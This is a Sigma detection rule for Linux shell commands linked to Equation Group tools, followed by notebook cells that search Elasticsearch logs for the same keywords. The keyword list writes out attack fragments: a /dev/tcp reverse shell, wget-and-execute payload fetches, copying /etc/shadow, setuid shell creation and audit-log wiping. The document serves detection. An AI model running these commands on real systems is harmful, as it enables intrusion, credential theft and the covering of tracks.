- title: Equation Group Indicators
id: 41e5c73d-9983-4b69-bd03-e13b67e9623c
description: Detects suspicious shell commands used in various Equation Group scripts
and tools
references:
- https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1
tags:
- attack.execution
- attack.g0020
- attack.t1059
author: Florian Roth
logsource:
product: linux
service: null
category: null
detection:
keywords:
- 'chown root*chmod 4777 '
- cp /bin/sh .;chown
- chmod 4777 /tmp/.scsi/dev/bin/gsh
- chown root:root /tmp/.scsi/dev/bin/
- chown root:root x;
- /bin/telnet locip locport < /dev/console | /bin/sh
- /tmp/ratload
- 'ewok -t '
- 'xspy -display '
- cat > /dev/tcp/127.0.0.1/80 <<END
- rm -f /current/tmp/ftshell.latest
- 'ghost_* -v '
- ' --wipe > /dev/null'
- ping -c 2 *; grep * /proc/net/arp >/tmp/gx
- iptables * OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;
- '> /var/log/audit/audit.log; rm -f .'
- cp /var/log/audit/audit.log .tmp
- sh >/dev/tcp/* <&1 2>&1
- ncat -vv -l -p * <
- nc -vv -l -p * <
- < /dev/console | uudecode && uncompress
- sendmail -osendmail;chmod +x sendmail
- /usr/bin/wget -O /tmp/a http* && chmod 755 /tmp/cron
- chmod 666 /var/run/utmp~
- chmod 700 nscd crond
- cp /etc/shadow /tmp/.
- </dev/console |uudecode > /dev/null 2>&1 && uncompress
- chmod 700 jp&&netstat -an|grep
- uudecode > /dev/null 2>&1 && uncompress -f * && chmod 755
- chmod 700 crond
- wget http*; chmod +x /tmp/sendmail
- chmod 700 fp sendmail pt
- chmod 755 /usr/vmsys/bin/pipe
- chmod -R 755 /usr/vmsys
- chmod 755 $opbin/*tunnel
- chmod 700 sendmail
- chmod 0700 sendmail
- /usr/bin/wget http*sendmail;chmod +x sendmail;
- '&& telnet * 2>&1 </dev/console'
condition: keywords
falsepositives:
- Unknown
level: high
In [ ]:
from elasticsearch import Elasticsearch
from elasticsearch_dsl import Search
import pandas as pd
In [ ]:
es = Elasticsearch(['http://helk-elasticsearch:9200'])
searchContext = Search(using=es, index='logs-*', doc_type='doc')
In [ ]:
s = searchContext.query('query_string', query='\*.keyword:(*chown\ root*chmod\ 4777\ * OR *cp\ \/bin\/sh\ .;chown* OR *chmod\ 4777\ \/tmp\/.scsi\/dev\/bin\/gsh* OR *chown\ root\:root\ \/tmp\/.scsi\/dev\/bin\/* OR *chown\ root\:root\ x;* OR *\/bin\/telnet\ locip\ locport\ \ \/dev\/console\ |\ \/bin\/sh* OR *\/tmp\/ratload* OR *ewok\ \-t\ * OR *xspy\ \-display\ * OR *cat\ \ \/dev\/tcp\/127.0.0.1\/80\ END* OR *rm\ \-f\ \/current\/tmp\/ftshell.latest* OR *ghost_*\ \-v\ * OR *\ \-\-wipe\ \ \/dev\/null* OR *ping\ \-c\ 2\ *;\ grep\ *\ \/proc\/net\/arp\ \/tmp\/gx* OR *iptables\ *\ OUTPUT\ \-p\ tcp\ \-d\ 127.0.0.1\ \-\-tcp\-flags\ RST\ RST\ \-j\ DROP;* OR *\ \/var\/log\/audit\/audit.log;\ rm\ \-f\ .* OR *cp\ \/var\/log\/audit\/audit.log\ .tmp* OR *sh\ \/dev\/tcp\/*\ &1\ 2&1* OR *ncat\ \-vv\ \-l\ \-p\ *\ * OR *nc\ \-vv\ \-l\ \-p\ *\ * OR *\ \/dev\/console\ |\ uudecode\ \&&\ uncompress* OR *sendmail\ \-osendmail;chmod\ \+x\ sendmail* OR *\/usr\/bin\/wget\ \-O\ \/tmp\/a\ http*\ \&&\ chmod\ 755\ \/tmp\/cron* OR *chmod\ 666\ \/var\/run\/utmp\~* OR *chmod\ 700\ nscd\ crond* OR *cp\ \/etc\/shadow\ \/tmp\/.* OR *\/dev\/console\ |uudecode\ \ \/dev\/null\ 2&1\ \&&\ uncompress* OR *chmod\ 700\ jp\&&netstat\ \-an|grep* OR *uudecode\ \ \/dev\/null\ 2&1\ \&&\ uncompress\ \-f\ *\ \&&\ chmod\ 755* OR *chmod\ 700\ crond* OR *wget\ http*;\ chmod\ \+x\ \/tmp\/sendmail* OR *chmod\ 700\ fp\ sendmail\ pt* OR *chmod\ 755\ \/usr\/vmsys\/bin\/pipe* OR *chmod\ \-R\ 755\ \/usr\/vmsys* OR *chmod\ 755\ $opbin\/*tunnel* OR *chmod\ 700\ sendmail* OR *chmod\ 0700\ sendmail* OR *\/usr\/bin\/wget\ http*sendmail;chmod\ \+x\ sendmail;* OR *\&&\ telnet\ *\ 2&1\ \/dev\/console*)')
response = s.execute()
if response.success():
df = pd.DataFrame((d.to_dict() for d in s.scan()))
In [ ]:
df.head()